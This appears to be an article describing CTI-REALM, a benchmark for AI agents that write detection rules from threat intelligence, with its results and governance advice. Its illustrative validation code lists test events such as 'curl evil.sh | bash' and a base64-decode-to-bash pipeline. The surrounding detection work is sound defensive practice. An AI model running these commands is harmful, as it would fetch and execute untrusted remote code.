The promise of AI-assisted cybersecurity has long been hampered by a fundamental measurement problem: how do organizations validate whether an AI agent can actually perform the complex, multi-step work that security analysts do every day? Traditional benchmarks test whether models can recall MITRE ATT&CK techniques or classify threat actor tactics, but they miss the harder question—can an agent translate raw threat intelligence into production-ready detection rules that find real attacks?
Microsoft Research has addressed this gap with CTI-REALM (Cyber Threat Intelligence Real World Evaluation and LLM Benchmarking), an open-source benchmark that evaluates AI agents on end-to-end detection engineering workflows. Released in March 2026, CTI-REALM measures whether agents can read threat intelligence reports, explore telemetry schemas, iteratively refine KQL queries, and produce validated Sigma rules and KQL detection logic—exactly the workflow security analysts follow when building detections for platforms like Microsoft Sentinel.
Why Traditional Benchmarks Fall Short
Existing cybersecurity AI benchmarks primarily test parametric knowledge—can a model name the technique behind a log entry, or correctly label a tactic from a threat report? While useful, these assessments evaluate isolated skills rather than the operational capability security teams actually need: translating narrative threat intelligence into working detection logic that identifies attacks in production environments.
CTI-REALM fills this gap by measuring three critical dimensions that earlier benchmarks overlook:
- Operationalization over recall: Agents must produce working Sigma rules and KQL queries validated against real attack telemetry, not just answer multiple-choice questions about threat actors.
- Complete workflow evaluation: The benchmark scores intermediate decision quality—CTI report selection, MITRE technique mapping, data source identification, and iterative query refinement—not just final output.
- Realistic tooling: Agents use the same tools security analysts rely on: CTI repositories, schema explorers, Kusto query engines, and MITRE ATT&CK databases.
This granular, checkpoint-based scoring reveals precisely where AI agents struggle in the detection pipeline, helping security leaders understand whether performance gaps stem from comprehension failures, query construction issues, or detection specificity problems.
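The checkpoint idea can be sketched as a weighted aggregate over workflow stages. The stage names and weights below are illustrative stand-ins, not CTI-REALM's actual rubric:

```python
# Illustrative sketch of checkpoint-based scoring for a detection-engineering
# workflow. Stage names and weights are hypothetical, not CTI-REALM's rubric.

CHECKPOINTS = {
    "cti_report_selection": 0.15,
    "technique_mapping": 0.20,
    "data_source_identification": 0.15,
    "query_refinement": 0.25,
    "final_detection_accuracy": 0.25,
}

def score_run(stage_scores: dict) -> float:
    """Weighted aggregate over per-stage scores in [0, 1].

    Stages the agent never reached score 0, so the per-stage breakdown
    shows exactly where the pipeline broke down.
    """
    return sum(
        weight * stage_scores.get(stage, 0.0)
        for stage, weight in CHECKPOINTS.items()
    )

# Example: an agent that maps techniques well but writes a weak final query.
run = {
    "cti_report_selection": 1.0,
    "technique_mapping": 0.9,
    "data_source_identification": 0.8,
    "query_refinement": 0.5,
    "final_detection_accuracy": 0.3,
}
print(round(score_run(run), 3))  # 0.65
```

The point of the per-stage breakdown is diagnostic: two agents with the same aggregate score can fail in very different places, which changes where human review effort should go.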
The Benchmark: Real Threat Intelligence, Real Azure Environments
Microsoft curated 37 CTI reports from public sources including Microsoft Security, Datadog Security Labs, Palo Alto Networks, and Splunk, selecting scenarios that could be faithfully simulated in sandboxed environments with telemetry suitable for detection development.
The benchmark spans three Azure-relevant platforms:
- Linux endpoints: Traditional host-based detection scenarios
- Azure Kubernetes Service (AKS): Container and orchestration layer attacks
- Azure cloud infrastructure: Multi-source, APT-style attack chains requiring correlation across identity, resource, and network logs
Ground-truth scoring validates detection rules at every workflow stage, from technique identification through final KQL query accuracy.
Key Findings: What Works, What Doesn't
Microsoft evaluated multiple frontier AI models on CTI-REALM-50, a subset spanning all three platforms. The results reveal both promise and clear limitations:
Performance drops sharply across platform complexity: Linux endpoint detections scored 0.585, AKS scenarios dropped to 0.517, and Azure cloud infrastructure plummeted to 0.282. This reflects the reality that multi-source correlation across identity logs, Azure Activity, and resource-specific telemetry remains exceptionally difficult for AI agents—precisely the scenario SOC teams working in Microsoft Sentinel face when investigating sophisticated, multi-stage cloud attacks.
More reasoning isn't always better: Within model families, medium reasoning configurations consistently outperformed high reasoning modes, suggesting that overthinking hurts performance in tool-rich, iterative agentic environments.
Structured guidance closes performance gaps: Providing smaller models with human-authored workflow guidance improved threat technique identification and closed approximately one-third of the performance gap to much larger models.
What This Means for Azure Security Operations
For security architects and SOC teams working with Microsoft Sentinel, CTI-REALM's findings have immediate practical implications:
| Traditional Detection Engineering | AI-Assisted Detection Engineering |
|---|---|
| Analyst reads threat report manually | AI agent parses CTI report and extracts techniques |
| Analyst identifies relevant MITRE techniques | Agent maps techniques to data sources automatically |
| Analyst explores schema, writes KQL queries | Agent iterates on KQL queries using schema tools |
| Analyst validates detection against test data | Agent generates Sigma rule + KQL validated against telemetry |
| Process takes hours to days per report | Process completes in minutes with human validation |
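To make the final-row artifact concrete, here is a minimal, hypothetical Sigma rule of the kind an agent would be expected to emit for a Linux endpoint scenario. The logsource, selection values, and metadata are invented for illustration and are not drawn from the benchmark:

```yaml
# Hypothetical agent-generated Sigma rule; illustrative only, not a CTI-REALM artifact.
title: Suspicious Base64-Decoded Shell Command (illustrative)
id: 00000000-0000-0000-0000-000000000000
status: experimental
description: Example of the Sigma output format an agent would produce alongside KQL.
logsource:
  product: linux
  category: process_creation
detection:
  selection:
    Image|endswith: '/bash'
    CommandLine|contains: 'base64 -d'
  condition: selection
falsepositives:
  - Administrative scripts that legitimately decode base64 payloads
level: medium
```

In the benchmark's workflow, a rule like this would be paired with equivalent KQL and validated against the sandboxed attack telemetry before it counts as a success.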
The benchmark demonstrates that AI agents can meaningfully accelerate detection development, particularly for Linux and AKS scenarios, where scores exceed 0.5. However, the 0.282 score for Azure cloud infrastructure detections underscores a critical reality: human expertise remains essential for validating complex, multi-source detections before operational deployment.
Security teams should view AI agents as analyst augmentation tools rather than replacements. The checkpoint-based scoring in CTI-REALM helps organizations identify where human review is most critical—typically in cloud correlation logic, detection specificity tuning, and false positive reduction.
Responsible Adoption: Human-in-the-Loop Remains Non-Negotiable
Microsoft's research reinforces that AI-generated detection rules require validation before production use. Organizations adopting AI-assisted detection workflows should implement structured governance:
- Validate AI-generated KQL queries against test datasets before enabling in Sentinel analytics rules
- Require peer review for detections targeting cloud infrastructure, where AI performance is weakest
- Benchmark models using CTI-REALM before considering downstream operational use
- Maintain detection metadata tracking whether rules originated from AI or human analysts to support incident response context
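The first governance point—validating a generated query against test data before enabling it—can be sketched locally. Since running real KQL requires a Sentinel workspace, this example uses a Python predicate as a stand-in for the query and replays it over labeled test rows, gating deployment on precision and recall. All names, events, and thresholds are illustrative:

```python
# Sketch of pre-deployment validation for an AI-generated detection.
# The predicate stands in for a KQL query; names and thresholds are illustrative.

from dataclasses import dataclass

@dataclass
class Event:
    command_line: str
    is_attack: bool  # ground-truth label from the test dataset

def detection(event: Event) -> bool:
    """Hypothetical agent-generated rule: flag base64-decoded shell payloads."""
    return "base64 -d" in event.command_line

def validate(rule, events, min_precision=0.9, min_recall=0.8):
    """Gate a rule on precision/recall over labeled test telemetry."""
    tp = sum(1 for e in events if rule(e) and e.is_attack)
    fp = sum(1 for e in events if rule(e) and not e.is_attack)
    fn = sum(1 for e in events if not rule(e) and e.is_attack)
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    return precision >= min_precision and recall >= min_recall, precision, recall

events = [
    Event("echo cGF5bG9hZA== | base64 -d | bash", True),
    Event("ls -la /tmp", False),
    Event("cat notes.txt | base64 -d", False),  # benign decode -> false positive
    Event("curl evil.sh | bash", True),         # missed attack -> false negative
]

ok, precision, recall = validate(detection, events)
print(ok, precision, recall)  # fails the gate: precision 0.5, recall 0.5
```

A harness like this makes the governance checklist mechanical: a rule that fails the gate goes back for refinement or peer review rather than into a live analytics rule.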
The benchmark's open-source availability on the Inspect AI repository enables security teams to test models against their own operational requirements before adoption.
The Path Forward
CTI-REALM represents a foundational shift in how the security industry evaluates AI capabilities—moving from knowledge recall to operational competence. For Azure practitioners, this matters because the benchmark's platforms (Linux, AKS, Azure cloud) and output formats (Sigma rules, KQL queries) directly mirror working with Microsoft Sentinel's analytics engine.
As Microsoft continues integrating AI capabilities into Security Copilot and the broader unified SIEM+XDR vision, benchmarks like CTI-REALM provide the measurement framework security leaders need to adopt AI responsibly—understanding both capabilities and limitations before operationalizing agent-assisted workflows.
The benchmark is freely available to model developers and security teams. Organizations interested in contributing, benchmarking, or exploring partnership opportunities can access the repository and contact Microsoft Research at msecaimrbenchmarking@microsoft.com.
About the Research: CTI-REALM was developed by Microsoft Research and announced March 20, 2026. The full technical paper, "CTI-REALM: A new benchmark for end-to-end detection rule generation with AI agents," is available on the Microsoft Security Blog.